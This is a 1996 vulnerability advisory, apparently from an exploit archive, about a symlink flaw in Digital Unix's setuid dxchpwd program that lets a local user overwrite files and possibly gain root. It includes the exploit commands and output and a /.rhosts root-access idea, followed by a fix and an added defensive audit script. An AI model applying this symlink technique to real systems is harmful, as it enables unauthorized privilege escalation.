Digital Unix /usr/tcb/bin/dxchpwd hole

Summary
Description: In Digital Unix, /usr/tcb/bin/dxchpwd creates log files in a very insecure manner.
Author: Eric Augustus (augustus@mail.stic.net)
Compromise: root (local)
Vulnerable Systems: at least Digital Unix v3.x with C2 security package installed
Date: 17 November 1996
Details

Exploit:

Subject: BoS: Digital Unix v3.x (v4.x?) security vulnerability
From: Eric Augustus (augustus@mail.stic.net)
Date: Sun, 17 Nov 1996 00:09:38 +0000 

In Digital Unix (OSF/1) v3.x, there is a security vulnerability in the
/usr/tcb/bin/dxchpwd program. The dxchpwd is installed as part of the
C2 security package. The dxchpwd can be used to overwrite any file, or
create a file anywhere on the system, causing a possible denial of
service and possibly leading to root access.

Background: dxchpwd is part of the C2 security package and is setuid
root. It's a GUI interface for users to change their passwds. As far
as I know, all Digital Unix v3.x versions are vulnerable, and possibly
4.x.

Details: When dxchpwd is run, it creates a log file /tmp/dxchpwd.log
which is root owned and mode 600. If the log file doesn't exist, it
can be symlinked to any existing file, or new file on the system. New
files are created root owned, mode 600.  Existing files retain their
permissions and ownership, but their contents are overwritten. If a
user then attempts to change a passwd, a message similar to the
following is written to the log file:

Unknown SIA Prompt: (* Permission denied.
 *) rendition 6

In this case, if /.rhosts were symlinked to /tmp/dxchpwd.log, then a
host known as Unknown could possibly gain root access.

Example:
$ ls -l /usr/tcb/bin/dxchpwd
-rwsr-xr-x   1 root     bin        49152 Jul 25  1995 /usr/tcb/bin/dxchpwd
$ ls -l /tmp/dxchpwd.log
/tmp/dxchpwd.log not found
$ export DISPLAY=:0     (or a remotehost)
$ ln -s /hackfile /tmp/dxchpwd.log
$ ls -l /hackfile
/hackfile not found
$ /usr/tcb/bin/dxchpwd
(The dxchpwd window will appear. Just enter root for username
 and anything for the passwd. You'll get a permission denied
 message and the window will close.)
$ ls -l /hackfile
-rw-------   1 root     system         0 Nov 16 22:44 /hackfile

Fix: Make sure /tmp/dxchpwd.log exists, which is root owned and at
least mode 600 until a patch is available. Of course, the setuid bit
could be removed, but then users couldn't use it to change their
passwds.

Gus
--
_________________________________________________________________________
Eric Augustus
1211 Saxonhill Drive
San Antonio, TX  78253
(210) 679-6497
augustus@stic.net
_____________________ #INCLUDE  _______________________
You May Be an Engineer if...
    people groan at the party when you pick out the music
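The interim fix in the post above (a pre-existing, root-owned, mode 600 /tmp/dxchpwd.log that is not a symlink) can be audited and applied with a small script. The following is an added example, not code from the advisory or from Digital; the path and expected owner are parameters so it can be tried on a scratch file, and it assumes a POSIX find(1) whose -perm 600 is an exact-mode match and a shell whose noclobber (set -C) redirection opens with O_EXCL.

```shell
#!/bin/sh
# Added example, not part of the advisory: audit (and if absent, create)
# the dxchpwd log file the way the interim fix requires. PATH and OWNER
# are parameters so the check can be tried on a scratch file; run it as
# root against /tmp/dxchpwd.log to get a root-owned file.
# Assumes a POSIX find(1) where -perm 600 is an exact-mode match, and a
# shell whose noclobber (set -C) redirection opens with O_EXCL.

# check_log_file PATH OWNER: 0 if PATH is a regular file (not a symlink),
# mode 0600 and owned by OWNER; otherwise print the reason and return 1.
check_log_file() {
    path=$1
    owner=$2
    # -L is tested first because -f follows symlinks.
    if [ -L "$path" ]; then
        printf '%s is a symbolic link; dxchpwd would write through it\n' "$path"
        return 1
    fi
    if [ ! -f "$path" ]; then
        printf '%s is missing or not a regular file\n' "$path"
        return 1
    fi
    # find on a single non-directory path evaluates only that path.
    if [ -z "$(find "$path" -perm 600 -print)" ]; then
        printf '%s is not mode 600\n' "$path"
        return 1
    fi
    if [ -z "$(find "$path" -user "$owner" -print)" ]; then
        printf '%s is not owned by %s\n' "$path" "$owner"
        return 1
    fi
    return 0
}

# create_log_file PATH: create PATH as an empty mode-0600 regular file.
# With noclobber the '>' redirection uses O_EXCL, so an existing file or
# a symlink planted at PATH (even a dangling one) makes it fail rather
# than being followed or truncated; the subshell keeps umask/-C local.
create_log_file() {
    path=$1
    if ( umask 077; set -C; : > "$path" ) 2>/dev/null; then
        return 0
    fi
    printf '%s already exists (possibly a symlink); left untouched\n' "$path"
    return 1
}
```

A cron job running `check_log_file /tmp/dxchpwd.log root` would also catch the file being removed (for example by a /tmp cleaner), which reopens the hole until it is recreated.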

This page is part of Fyodor's exploit world.